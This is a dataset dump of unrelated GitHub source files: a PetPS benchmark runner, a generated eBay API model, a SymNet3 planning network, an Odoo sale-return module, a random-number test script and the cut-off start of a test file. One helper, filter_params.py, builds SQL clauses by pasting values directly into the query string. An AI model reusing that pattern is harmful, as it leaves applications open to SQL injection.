os.makedirs(self.log_dir, exist_ok=True)\n self._BeforeStartAllRun()\n all_configs = self._AllRuns()\n all_configs = self._SortRuns(all_configs)\n print(\"len of all configs = \", len(all_configs))\n previous_run = None\n for each_i, each_run in enumerate(all_configs):\n self._RunHook(previous_run, each_run)\n print(datetime.datetime.now(),\n f'EXP{self.exp_id}: {each_i} / {len(all_configs)}', flush=True)\n each_run.run()\n previous_run = each_run\n\n self._RunHook(previous_run, None)\n\n\nclass CSRun(BaseRun):\n def __init__(self, ps_servers, client_servers,\n exp_id, run_id, log_dir,\n server_config, client_config,\n server_bin_path, client_bin_path\n ) -> None:\n super().__init__(exp_id)\n self.run_id = run_id\n self.log_dir = log_dir\n self.server_config = server_config\n self.client_config = client_config\n self.ps_servers = ps_servers\n self.client_servers = client_servers\n self.server_bin_path = server_bin_path\n self.client_bin_path = client_bin_path\n self.check_config()\n\n def check_config(self,):\n if len(self.ps_servers) == 0 or len(self.client_servers) == 0:\n raise Exception(\"no machines\")\n\n # wait a condition to start client processes\n def _ClientWaitServer(self):\n raise NotImplementedError\n\n def 
run(self, ):\n        os.makedirs(self.log_dir, exist_ok=True)\n        print(f\"mkdir {self.log_dir}\")\n        time.sleep(1)\n        # dump config\n        dumped_config = {\n            \"server\":\n            self.server_config,\n            \"client\": self.client_config,\n        }\n        dir_path = os.path.dirname(os.path.realpath(__file__))\n\n        subprocess.run(\n            f\"bash {dir_path}/../third_party/Mayfly-main/script/restartMemc.sh\", shell=True, check=True)\n        \n        global_id = 0\n        for ps_id, (each_host, numa_id) in enumerate(self.ps_servers):\n            config = ' '.join(\n                [f'--{k}={v}' for k, v in self.server_config.items()])\n            server_command = f'''{self.server_bin_path} --numa_id={numa_id} --global_id={global_id} \\\n                --num_server_processes={len(self.ps_servers)} --num_client_processes={len(self.client_servers)} \\\n                {config} >{self.log_dir}/ps_{ps_id} 2>&1'''\n            RemoteExecute(each_host, server_command, PROJECT_ABS_PATH)\n            dumped_config[f'server_{ps_id}'] = server_command\n            global_id += 1\n\n        self._ClientWaitServer()\n\n        for client_id, (each_host, numa_id) in enumerate(self.client_servers):\n            config = ' '.join(\n                [f'--{k}={v}' for k, v in self.client_config.items()])\n            client_command = f'''{self.client_bin_path} --numa_id={numa_id} --global_id={global_id} \\\n                --num_server_processes={len(self.ps_servers)} --num_client_processes={len(self.client_servers)} \\\n                {config} >{self.log_dir}/client_{client_id} 2>&1'''\n            RemoteExecute(each_host, client_command, PROJECT_ABS_PATH)\n            dumped_config[f'client_{client_id}'] = client_command\n            global_id += 1\n\n        with open(f'{self.log_dir}/config', 'w') as f:\n            import json\n            json.dump(dumped_config, f, indent=2)\n\n\nclass CSExperiment(Experiment):\n    def __init__(self, exp_id, common_config, server_config, client_config, ps_servers, client_servers) -> None:\n        super().__init__(exp_id)\n        self.common_config = common_config\n        self.server_config = server_config\n        self.client_config = client_config\n        self.ps_servers = ps_servers\n        self.client_servers = client_servers\n\n    def _AllRuns(self,):\n        return list(self.get_next_config())\n\n    def _PostprocessConfig(self, server_configs, client_configs):\n        # don't use self\n        raise NotImplementedError\n\n    def _CreateRun(self, run_id, run_log_dir, run_server_config, run_client_config,):\n        raise NotImplementedError\n\n    def get_next_config(self, ):\n        common_config = PreprocessConfig(self.common_config)\n        server_config = PreprocessConfig(self.server_config)\n        client_config = PreprocessConfig(self.client_config)\n\n        # [(dictA, dictB), (dictA, dictB), (dictA, dictB),]\n        print(\"server_config has \", len(server_config), \"configs\")\n        print(\"client_config has \", len(client_config), \"configs\")\n\n        def find_start_run_id():\n            import re\n            ids = [int(re.search(r'(\\d+)', each)[1])\n                   for each in os.listdir(self.log_dir)]\n            if len(ids) != 0:\n                max_id = max(ids)\n            if len(ids) == 0:\n                max_id = -1\n            print(os.listdir(self.log_dir))\n            return max_id + 1\n\n        run_id = find_start_run_id()\n        print(f\"-------start run_id ={run_id} ====================\")\n        runs = []\n        for each_common_config in common_config:\n            for each_server_config in server_config:\n                for each_client_config in client_config:\n                    each_server_config_copy = each_server_config.copy()\n                    each_client_config_copy = each_client_config.copy()\n                    each_server_config_copy.update(each_common_config)\n                    each_client_config_copy.update(each_common_config)\n                    # add custom process\n                    self._PostprocessConfig(\n                        each_server_config_copy, each_client_config_copy)\n\n                    runs.append(self._CreateRun(run_id, os.path.join(\n                        self.log_dir, f'run_{run_id}'), each_server_config_copy, 
each_client_config_copy))\n run_id += 1\n for each in runs:\n yield each\n","repo_name":"thustorage/PetPS","sub_path":"benchmark/bench_base.py","file_name":"bench_base.py","file_ext":"py","file_size_in_byte":6898,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"52"} +{"seq_id":"14710930616","text":"# coding: utf-8\n\n\"\"\"\n Seller Service Metrics API \n\n The Analytics API provides data and information about a seller and their eBay business. The resources and methods in this API let sellers review information on their listing performance, metrics on their customer service performance, and details on their eBay seller performance rating. The three resources in the Analytics API provide the following data and information: Customer Service Metric – Returns data on a seller's customer service performance as compared to other seller's in the same peer group. Traffic Report – Returns data that shows how buyers are engaging with a seller's listings. Seller Standards Profile – Returns data pertaining to a seller's performance rating. Sellers can use the data and information returned by the various Analytics API methods to determine where they can make improvements to increase sales and how they might improve their seller status as viewed by eBay buyers. For details on using this API, see Analyzing seller performance.\n\n OpenAPI spec version: 1.2.0\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n\nfrom pprint import pformat\nfrom six import iteritems\nimport re\n\n\nclass StandardsProfile(object):\n \"\"\"\n NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\n \"\"\"\n def __init__(self, cycle=None, default_program=None, evaluation_reason=None, metrics=None, program=None, standards_level=None):\n \"\"\"\n StandardsProfile - a model defined in Swagger\n\n :param dict swaggerTypes: The key is attribute name\n and the value is attribute type.\n :param dict attributeMap: The key is attribute name\n and the value is json key in definition.\n \"\"\"\n self.swagger_types = {\n 'cycle': 'Cycle',\n 'default_program': 'bool',\n 'evaluation_reason': 'str',\n 'metrics': 'list[Metric]',\n 'program': 'str',\n 'standards_level': 'str'\n }\n\n self.attribute_map = {\n 'cycle': 'cycle',\n 'default_program': 'defaultProgram',\n 'evaluation_reason': 'evaluationReason',\n 'metrics': 'metrics',\n 'program': 'program',\n 'standards_level': 'standardsLevel'\n }\n\n self._cycle = cycle\n self._default_program = default_program\n self._evaluation_reason = evaluation_reason\n self._metrics = metrics\n self._program = program\n self._standards_level = standards_level\n\n @property\n def cycle(self):\n \"\"\"\n Gets the cycle of this StandardsProfile.\n\n\n :return: The cycle of this StandardsProfile.\n :rtype: Cycle\n \"\"\"\n return self._cycle\n\n @cycle.setter\n def cycle(self, cycle):\n \"\"\"\n Sets the cycle of this StandardsProfile.\n\n\n :param 
cycle: The cycle of this StandardsProfile.\n :type: Cycle\n \"\"\"\n\n self._cycle = cycle\n\n @property\n def default_program(self):\n \"\"\"\n Gets the default_program of this StandardsProfile.\n If set to true, this flag indicates this is the default program for the seller. Except for sellers in China, a seller's default program is the marketplace where they registered with eBay. Seller's in China select their default program when they register.\n\n :return: The default_program of this StandardsProfile.\n :rtype: bool\n \"\"\"\n return self._default_program\n\n @default_program.setter\n def default_program(self, default_program):\n \"\"\"\n Sets the default_program of this StandardsProfile.\n If set to true, this flag indicates this is the default program for the seller. Except for sellers in China, a seller's default program is the marketplace where they registered with eBay. Seller's in China select their default program when they register.\n\n :param default_program: The default_program of this StandardsProfile.\n :type: bool\n \"\"\"\n\n self._default_program = default_program\n\n @property\n def evaluation_reason(self):\n \"\"\"\n Gets the evaluation_reason of this StandardsProfile.\n Specifies how the overall seller level was calculated. In the event of special circumstances (as determined by eBay), eBay may override the calculated seller level. In general, such overrides protect a seller's level. The usual value for both cycle types is "Seller level generated by standards monthly evaluation cycle."\n\n :return: The evaluation_reason of this StandardsProfile.\n :rtype: str\n \"\"\"\n return self._evaluation_reason\n\n @evaluation_reason.setter\n def evaluation_reason(self, evaluation_reason):\n \"\"\"\n Sets the evaluation_reason of this StandardsProfile.\n Specifies how the overall seller level was calculated. In the event of special circumstances (as determined by eBay), eBay may override the calculated seller level. In general, such overrides protect a seller's level. The usual value for both cycle types is "Seller level generated by standards monthly evaluation cycle."\n\n :param evaluation_reason: The evaluation_reason of this StandardsProfile.\n :type: str\n \"\"\"\n\n self._evaluation_reason = evaluation_reason\n\n @property\n def metrics(self):\n \"\"\"\n Gets the metrics of this StandardsProfile.\n A list of the metrics upon which a seller's profile is evaluated. Each program's applicable metrics and requirements are listed at eBay Top Rated seller program standards.\n\n :return: The metrics of this StandardsProfile.\n :rtype: list[Metric]\n \"\"\"\n return self._metrics\n\n @metrics.setter\n def metrics(self, metrics):\n \"\"\"\n Sets the metrics of this StandardsProfile.\n A list of the metrics upon which a seller's profile is evaluated. Each program's applicable metrics and requirements are listed at eBay Top Rated seller program standards.\n\n :param metrics: The metrics of this StandardsProfile.\n :type: list[Metric]\n \"\"\"\n\n self._metrics = metrics\n\n @property\n def program(self):\n \"\"\"\n Gets the program of this StandardsProfile.\n Indicates the program used to generate the profile data. Values can be PROGRAM_DE, PROGRAM_UK, PROGRAM_US, or PROGRAM_GLOBAL. 
For implementation help, refer to eBay API documentation\n\n :return: The program of this StandardsProfile.\n :rtype: str\n \"\"\"\n return self._program\n\n @program.setter\n def program(self, program):\n \"\"\"\n Sets the program of this StandardsProfile.\n Indicates the program used to generate the profile data. Values can be PROGRAM_DE, PROGRAM_UK, PROGRAM_US, or PROGRAM_GLOBAL. For implementation help, refer to eBay API documentation\n\n :param program: The program of this StandardsProfile.\n :type: str\n \"\"\"\n\n self._program = program\n\n @property\n def standards_level(self):\n \"\"\"\n Gets the standards_level of this StandardsProfile.\n The overall standards level of the seller, one of TOP_RATED, ABOVE_STANDARD, or BELOW_STANDARD. For implementation help, refer to eBay API documentation\n\n :return: The standards_level of this StandardsProfile.\n :rtype: str\n \"\"\"\n return self._standards_level\n\n @standards_level.setter\n def standards_level(self, standards_level):\n \"\"\"\n Sets the standards_level of this StandardsProfile.\n The overall standards level of the seller, one of TOP_RATED, ABOVE_STANDARD, or BELOW_STANDARD. For implementation help, refer to eBay API documentation\n\n :param standards_level: The standards_level of this StandardsProfile.\n :type: str\n \"\"\"\n\n self._standards_level = standards_level\n\n def to_dict(self):\n \"\"\"\n Returns the model properties as a dict\n \"\"\"\n result = {}\n\n for attr, _ in iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"\n Returns the string representation of the model\n \"\"\"\n return pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"\n For `print` and `pprint`\n \"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"\n Returns true if both objects are equal\n \"\"\"\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"\n Returns true if both objects are not equal\n \"\"\"\n return not self == other\n","repo_name":"Hatraco-GmbH/ebay","sub_path":"analytics/ebayanalytics/models/standards_profile.py","file_name":"standards_profile.py","file_ext":"py","file_size_in_byte":10300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"34662518156","text":"import tensorflow as tf\nfrom symnet3.unet import GATConvLayer, GATConvLayerDistance\nfrom symnet3.action_decoder import ActionDecoder\nimport numpy as np\nimport pdb\nuse_self_loops_in_all_adj = True\nremove_attn = False\n\nsymnet_params = {\"channels\", \"num_postprocess\", \"num_preprocess\", \"attn_heads\", \"dropout_rate\", \"activation\", \"conv_type\", \"num_edge_types\", \"use_shared_gat\"}\ngat_params = {\"channels\", \"attn_heads\", \"dropout_rate\", \"activation\", \"conv_type\", \"num_edge_types\", \"use_shared_gat\"}\n\nclass SymNet3(tf.keras.Model):\n def __init__(self, general_params, se_params, ad_params, ge_params, tm_params, env_instance_wrapper=None):\n\n super(SymNet3, self).__init__()\n\n self.general_params = general_params\n self.se_params = se_params\n self.ad_params = ad_params\n self.ge_params = 
ge_params\n self.tm_params = tm_params\n self.tfm_params = self.ge_params[\"tfm_params\"]\n\n self.out_deg = self.general_params[\"add_out_deg\"]\n self.in_deg = self.general_params[\"add_in_deg\"]\n self.bet_cen = self.general_params[\"add_bet_cen\"]\n self.dist_leaves = self.general_params[\"add_dist_leaves\"]\n self.use_bidir_edges = self.general_params[\"use_bidir_edges\"]\n self.make_grid = self.general_params[\"make_grid\"]\n\n self.use_distance_mat = se_params[\"use_distance_mat\"]\n self.se_type = self.se_params[\"type\"]\n self.se_count = self.se_params[\"num_se\"]\n self.se_params[\"num_edge_types\"] = None\n self.use_edge_types = se_params[\"use_edge_types\"]\n self.preprocess_gat = se_params[\"use_preprocess_layer\"]\n\n if self.use_distance_mat:\n arg_dict = dict((k, self.se_params[k]) for k in gat_params)\n arg_dict[\"num_edge_types\"] = 1 # len(env_instance_wrapper.envs[0].instance_parser.dbn_edge_types_to_idx)\n arg_dict[\"filter_size\"] = 1\n arg_dict[\"concat_last_gat\"] = False\n arg_dict[\"attn_heads\"] = se_params[\"num_dist_attn_heads\"]\n arg_dict[\"return_attn_coef\"] = True\n self.gat_distance_mat = GATConvLayerDistance(**arg_dict)\n print(\"Built gat_distance_mat\")\n\n if self.use_edge_types:\n self.se_params[\"num_edge_types\"] = self.se_params[\"num_se\"]\n \n if self.preprocess_gat:\n self.se_list_preprocess = self.get_state_encoder(self.se_params[\"num_preprocess\"], env_instance_wrapper)\n self.se_list_postprocess = self.get_state_encoder(self.se_params[\"num_postprocess\"], env_instance_wrapper)\n else:\n self.se_list_postprocess = self.get_state_encoder(self.se_params[\"num_postprocess\"], env_instance_wrapper)\n \n \n self.final_node_embedder = tf.keras.layers.Dense(units=self.se_params[\"out_dim\"], activation=self.se_params[\"activation\"])\n\n self.ge_type = self.ge_params[\"type\"]\n \n self.num_action_dim = self.se_params[\"out_dim\"]\n self.action_decoders = self.get_action_decoder()\n self.value_decoders = self.get_action_decoder()\n\n\n def get_node_feature_dim(self, env_instance_wrapper):\n state, _ = env_instance_wrapper.envs[0].reset()\n adjacency_matrix, node_features, graph_features, action_details = self.get_parsed_state([state], 0, env_instance_wrapper)\n return node_features.shape[-1]\n\n def get_ckpt_parts(self):\n ckpt_parts = {}\n ckpt_parts[\"se_list\"] = self.se_list_postprocess\n ckpt_parts[\"final_node_embedder\"] = self.final_node_embedder\n ckpt_parts[\"next_state_projection\"] = self.next_state_projection\n ckpt_parts[\"reward_projection\"] = self.reward_projection\n ckpt_parts[\"action_decoders\"] = self.action_decoders\n return ckpt_parts\n\n def init_network(self, env_wrapper, instance):\n initial_state, _ = env_wrapper.envs[instance].reset() # Initial state\n self.policy_prediction(states=[initial_state], instance=instance, env_wrapper=env_wrapper)\n\n def get_state_encoder(self, num_se, env_instance_wrapper):\n se_list = []\n if self.use_edge_types:\n args = dict((k, self.se_params[k]) for k in gat_params)\n args['filter_size'] = num_se\n print(f\"Building a GAT with depth {num_se}\")\n se_list.append(GATConvLayer(**args))\n else:\n for _ in range(num_se):\n se_list.append(GATConvLayer(**dict((k, self.se_params[k]) for k in symnet_params)))\n return se_list\n\n def get_action_decoder(self):\n action_decoders = []\n for _ in range(self.ad_params[\"num_action_templates\"]):\n action_decoders.append(ActionDecoder(self.ad_params))\n return action_decoders\n\n def get_parsed_state(self, states, instance, env_wrapper):\n 
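# Parse raw environment states into graph tensors (adjacency, node\n        # features, graph features) plus per-action metadata; edges are\n        # symmetrized below when use_bidir_edges is set.\n        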
adjacency_matrix, node_features, graph_features = env_wrapper.get_parsed_state(states, instance)\n action_details = env_wrapper.get_action_details(instance)\n\n if self.use_bidir_edges:\n adjacency_matrix = adjacency_matrix + tf.transpose(adjacency_matrix, perm=[0, 1, 3, 2])\n adjacency_matrix = tf.clip_by_value(adjacency_matrix, 0, 1)\n\n return adjacency_matrix, node_features, graph_features, action_details\n\n\n def policy_prediction_helper(self, batch_size, adjacency_matrix_full, env_wrapper, instance, graph_features, action_details, se_embed_l, sample, training, prune_actions):\n node_embed = tf.concat(se_embed_l, axis=-1)\n final_node_embedding = self.final_node_embedder(node_embed)\n global_embed = tf.reshape(tf.concat([tf.reduce_max(final_node_embedding, axis=1), graph_features], axis=1), [batch_size, -1])\n if self.ge_type == \"deep_global_pool\":\n A = tf.reduce_max(adjacency_matrix_full, 0)\n global_embed_pool = self.global_embedder_net(final_node_embedding, A)\n global_embed = tf.concat([global_embed, global_embed_pool], axis=-1)\n\n action_scores = [0 for i in range(len(action_details))] # Score of each action\n action_affects = env_wrapper.envs[instance].instance_parser.action_affects\n remove_dbn = env_wrapper.envs[instance].instance_parser.remove_dbn\n for i in range(len(action_details)):\n action_template = action_details[i][0]\n input_nodes = list(action_details[i][1])\n arg_nodes = action_details[i][2]\n global_embed_temp = global_embed\n \n if len(arg_nodes) == 0: # Unparametrized action\n action_scores[i] = self.action_decoders[action_template]([global_embed_temp, None, training])\n else:\n if len(input_nodes) > 0:\n temp_embedding_list = [ # Select embeddings of nodes used\n tf.reshape(final_node_embedding[:, inp, :], [batch_size, self.num_action_dim]) for inp in input_nodes]\n node_state_embedding_concat = tf.concat(temp_embedding_list, axis=1) # Concat embeddings of all affected nodes\n node_state_embedding_reshape = tf.reshape(node_state_embedding_concat, [batch_size, len(input_nodes), self.num_action_dim])\n node_state_embedding_pooled = tf.reshape(tf.reduce_max(node_state_embedding_reshape, axis=1), [batch_size, self.num_action_dim]) # Max Pool\n arg_embedding_list = [tf.reshape(final_node_embedding[:, inp, :], [batch_size, self.num_action_dim]) for inp in arg_nodes]\n node_state_embedding_pooled = tf.concat(arg_embedding_list + [node_state_embedding_pooled], axis=1)\n action_scores[i] = self.action_decoders[action_template]([node_state_embedding_pooled, global_embed_temp, training])\n else:\n if remove_dbn:\n arg_embedding_list = [tf.reshape(final_node_embedding[:, inp, :], [batch_size, self.num_action_dim]) for inp in arg_nodes]\n action_scores[i] = self.action_decoders[action_template]([tf.concat(arg_embedding_list, axis=1), global_embed_temp, training])\n else:\n gnd_action_affects = action_affects[action_template]\n # Wildfire case; Treat as NOOP\n if gnd_action_affects:\n # IF wildfire\n action_template = action_details[0][0]\n action_scores[i] = self.action_decoders[action_template]([global_embed_temp, None, training])\n else:\n arg_embedding_list = [tf.reshape(final_node_embedding[:, inp, :], [batch_size, self.num_action_dim]) for inp in arg_nodes]\n action_scores[i] = self.action_decoders[action_template]([tf.concat(arg_embedding_list + [tf.zeros([batch_size, self.num_action_dim], tf.float64)], axis= 1), global_embed_temp, training])\n action_scores = tf.concat(action_scores, axis=-1)\n\n if sample:\n logits = tf.nn.log_softmax(action_scores)\n if 
prune_actions:\n # Get the actions you want to keep\n masks = env_wrapper.get_prune_mask(states, instance)\n masks = logits.dtype.min * (1.0 - masks)\n logits += masks\n return tf.random.categorical(logits=logits, num_samples=batch_size, dtype=tf.int32) # Return sampled actions\n else:\n if prune_actions:\n # Get the actions you want to keep\n masks = env_wrapper.get_prune_mask(states, instance)\n masks = -10e9 * (1.0 - masks)\n action_scores += masks\n probs = tf.nn.softmax(action_scores) # Expected shape is (batch_size,num_actions)\n return probs\n\n def policy_prediction(self, states, instance, env_wrapper, sample=False, action=None, plot_graph=False, file_name=None, action_taken=None, training=True, prune_actions=False, return_attn_coef=False, return_node_emb=False):\n adjacency_matrix, node_features, graph_features, action_details = self.get_parsed_state(states, instance, env_wrapper)\n adjacency_matrix = np.transpose(adjacency_matrix, [0, 1, 3, 2])\n batch_size = node_features.shape[0]\n num_nodes = node_features.shape[1]\n if self.preprocess_gat:\n se_embed_l = []\n if self.use_edge_types:\n for i, se in enumerate(self.se_list_preprocess):\n # res = se(node_features, adjacency_matrix[i], use_self_loops_in_all_adj, remove_attn) INITIAL ERROR\n res = se(node_features, adjacency_matrix, use_self_loops_in_all_adj, remove_attn)\n se_embed_l.append(res)\n node_features = tf.concat(se_embed_l, axis=-1)\n else:\n for i, se in enumerate(self.se_list_preprocess):\n res = se(node_features, adjacency_matrix[i], use_self_loops_in_all_adj, remove_attn) # INITIAL ERROR\n # res = se(node_features, adjacency_matrix, use_self_loops_in_all_adj, remove_attn)\n se_embed_l.append(res)\n node_features = tf.concat(se_embed_l, axis=-1)\n \n # print(len(se_embed_l), \"Preprocess:\", node_features.shape)\n \n if self.use_distance_mat:\n d = np.max(adjacency_matrix.astype(\"int32\"), 0)\n d = env_wrapper.get_distance_mat(d, instance)\n mask = env_wrapper.get_distance_mask(instance)[None,:] # A 2D mask \n mask = tf.repeat(mask, d.shape[0], axis=0)\n d = np.transpose(d, [1, 0, 2, 3])\n adjacency_matrix_fc = np.ones_like(d)\n distance_features, dist_attn_coef = self.gat_distance_mat(node_features, adjacency_matrix_fc, d, mask, use_self_loops_in_all_adj, remove_attn, beta=1.0)\n node_features = tf.concat([node_features, distance_features], axis=-1)\n \n se_embed_l = []\n if self.use_edge_types:\n res = self.se_list_postprocess[0](node_features, adjacency_matrix, use_self_loops_in_all_adj, remove_attn)\n se_embed_l.append(res)\n else:\n for i, se in enumerate(self.se_list_postprocess):\n res = se(node_features, adjacency_matrix[i], use_self_loops_in_all_adj, remove_attn)\n se_embed_l.append(res)\n if return_attn_coef:\n return self.policy_prediction_helper(batch_size, adjacency_matrix, env_wrapper, instance, graph_features, action_details, se_embed_l, training=training, sample=sample, prune_actions=prune_actions), dist_attn_coef\n elif return_node_emb:\n return self.policy_prediction_helper(batch_size, adjacency_matrix, env_wrapper, instance, graph_features, action_details, se_embed_l, training=training, sample=sample, prune_actions=prune_actions), se_embed_l\n else:\n return self.policy_prediction_helper(batch_size, adjacency_matrix, env_wrapper, instance, graph_features, action_details, se_embed_l, training=training, sample=sample, 
prune_actions=prune_actions)\n","repo_name":"dair-iitd/symnet3","sub_path":"multi_train/deep_plan/networks/symnet3/symnet3.py","file_name":"symnet3.py","file_ext":"py","file_size_in_byte":13049,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"35475003069","text":"#Program at least two pseudo-random number generators, in particular the LCG (GCL) generator, which\n#must be tested with at least four tests to determine the quality of the generation. The programmed\n#generators must also be compared against others, including the one built into the Python language\n\n#https://tereom.github.io/est-computacional-2018/numeros-pseudoaleatorios.html\nimport math\nimport numpy as np\nimport random as rand\n\nfrom scipy.stats import chi2\n\n\nsemilla = 10\n\n\ndef GenMedio(intervalo):\n    x = semilla\n    if len(str(x)) > 4:\n        x = int(str(x)[:4])\n    while len(str(x)) < 4:\n        x = int(str(x)+\"1\")\n    while True:\n        square = x * x\n        if len(str(square)) < 8:\n            need = 8 - len(str(square))\n            addZero = \"\"\n            for j in range(0,need):\n                addZero = str(0) + addZero\n            square = addZero + str(square)\n        else:\n            square = str(square)\n        x = int(square[2] + square[3] + square[4] + square[5])\n        yield x\n\n\ndef GenGCL( intervalo):\n    a, b = intervalo[0], intervalo[1]\n    # parameters as in GNU C Library\n    mult = 54321\n    c = 44498 # increment\n    m = 2**32 # modulus\n    xi = semilla\n    while True:\n        xf = (mult * xi + c) % m\n        xi = xf\n        yield int((b - a) * (xf / (m - 1)) + a)\n\n\ndef DatosGCL(n, intervalo):\n    lista = []\n    gen = GenGCL(intervalo)\n    for i in range(n):\n        sig = next(gen)\n        lista.append(int(sig))\n    return lista\n\n\ndef DatosMedio(n, intervalo):\n    lista = []\n    gen = GenMedio(intervalo)\n    for i in range(n):\n        sig = next(gen)\n        lista.append(int(sig))\n    return lista\n\ndef DatosRandint(n, rango):\n    u=[]\n    for i in range(15000):\n        u.append(rand.random())\n    return u\n\n\ndef testChi(u,n):\n    print(\"Chi-squared test\")\n    a=[]\n    b=1500\n    c=0.1\n    for i in range (n):\n        x =0\n        for j in range (len(u)):\n            if (c-0.1)<=float(u[j])<=c:\n                x+=1\n        a.append(x)\n        c+=0.1\n    x2=0\n    for i in range(len(a)):\n        x2+=(((a[i]-b)**2)/b)\n    print(\"X2 = \"+ str(x2))\n\n\ndef testCorridas(u):\n    print(\"Runs test:\")\n    lista = []\n    cont = 1\n    for i in range(len(u)-1):\n        if u[i+1] >= u[i]:\n            lista.append(\"+\")\n        else:\n            lista.append(\"-\")\n\n    for i in range(1, len(lista)):\n        if (lista[i] != lista[i-1]):\n            cont += 1\n    n = len(lista)\n    media = (2*n-1)/3\n    desv = math.sqrt((16*n-29)/90)\n    z = (cont-media)/desv\n    print(\"Z= \"+ str(z))\n\n\ndef main():\n    rango = [1, 100]\n    a=DatosGCL(50,rango)\n    b=DatosRandint(50,rango)\n    c=DatosMedio(50,rango)\n    print(a)\n    print(b)\n    print(c)\n    testCorridas(a)\n    testCorridas(b)\n    testCorridas(c)\n    testChi(a,50)\n    testChi(b,50)\n    testChi(c,50)\n\n\n\nmain()\n","repo_name":"DamianBarzola/Simulacion","sub_path":"TP2.1.py","file_name":"TP2.1.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"10686050472","text":"\n\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\n\n\nclass SaleOrder(models.Model):\n    _inherit = 'sale.order'\n    my_sale_return_show = fields.Boolean(compute=\"_check_sale_return_show\")\n    \n    my_picking_ids = fields.Many2many('stock.picking', 'return_picking_rel',\n                                      'sale_id', 'stock_pick_id',\n                                      string='Returns',\n                                      copy=False, store=True)\n    incoming_count = fields.Integer(string=\"Incoming shipments\",\n                                    compute=\"_compute_picks\")\n    \n    
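# One2many to the sale.order.return records created for this order.\n    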
my_return_ids = fields.One2many('sale.order.return', 'my_sale_order_id',\n string=\"Returns\", readonly=True)\n procurement_group_id = fields.Many2one('procurement.group', 'Procurement Group', copy=True)\n # my_return_ids = fields.One2many('create.return.sale', 'knk_sale_order_id',\n # string=\"Returns\", readonly=True)\n\n @api.depends('my_picking_ids')\n def _compute_picks(self):\n for rec in self:\n rec.incoming_count = 0\n if rec.my_picking_ids:\n rec.incoming_count = len(rec.my_picking_ids)\n\n def action_view_in_picking(self):\n action = self.env[\"ir.actions.actions\"]._for_xml_id(\"stock.action_picking_tree_all\")\n pickings = self.mapped('my_picking_ids')\n if len(pickings) > 1:\n action['domain'] = [('id', 'in', pickings.ids)]\n elif pickings:\n form_view = [(self.env.ref('stock.view_picking_form').id, 'form')]\n if 'views' in action:\n action['views'] = form_view + [\n (state, view) for state, view in action['views'] if view != 'form']\n else:\n action['views'] = form_view\n action['res_id'] = pickings.id\n return action\n\n @api.depends('picking_ids')\n def _check_sale_return_show(self):\n for rec in self:\n rec.my_sale_return_show = False\n picks = rec.picking_ids.filtered(lambda x: x.picking_type_code == 'outgoing' and x.state == 'done')\n if picks:\n rec.my_sale_return_show = True\n\n def open_sale_return(self):\n ctx = self.env.context.copy()\n ctx.update({\n 'default_my_sale_order_id': self.id,\n })\n return{\n 'name': 'Returns',\n 'type': 'ir.actions.act_window',\n 'res_model': 'create.return.sale',\n 'view_mode': 'form',\n 'target': 'new',\n 'context': ctx\n }\n\n\n\n\n\n\n\nclass SaleOrderLineInherit(models.Model):\n _inherit = \"sale.order.line\"\n\n \n my_return_qty = fields.Float(string=\"Returned\",\n compute=\"_return_qty_count\")\n my_balanced_qty = fields.Float(string=\"Balanced\", compute=\"_return_qty_count\")\n\n @api.depends('order_id.my_picking_ids')\n def _return_qty_count(self):\n for rec in self:\n picks = self.env['stock.picking'].search(\n [('id', 'in', rec.order_id.my_picking_ids.ids),\n ('state', '=', 'done')])\n qty = 0\n for pick in picks:\n line = pick.move_ids_without_package.filtered(\n lambda x: x.product_id == rec.product_id)\n qty += line.quantity_done\n rec.my_return_qty = qty\n rec.my_balanced_qty = rec.qty_delivered - rec.my_return_qty\n\n\n\n \n\n\n\n\n\n","repo_name":"mamadoteba2020/hatim_oman","sub_path":"sum_modules_of_odoo_15/return_sale_order/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"19116959736","text":"def param_options(ranges: list, filters: list = None) -> str:\n # create filter param string\n terms = \"\"\n if filters is not None:\n for term in filters:\n for key, value in term.items():\n if isinstance(value, list):\n s = tuple([j for j in value])\n terms += f\"{key} IN {s} AND \"\n else:\n terms += f\"{key} IN ('{value}') AND \"\n \n terms += f\" EntryDate BETWEEN '{ranges[0]}' AND '{ranges[1]}'\"\n\n return terms","repo_name":"timothyyv/python-kafka-poc","sub_path":"src/utils/filter_params.py","file_name":"filter_params.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"2028519501","text":"from jsonschema import validate, ValidationError\nfrom time import sleep, time\nfrom nose.tools import *\nfrom tests import *\nimport bx\n\n\ndef test_none():\n \"\"\"Tests db.exp, with a 
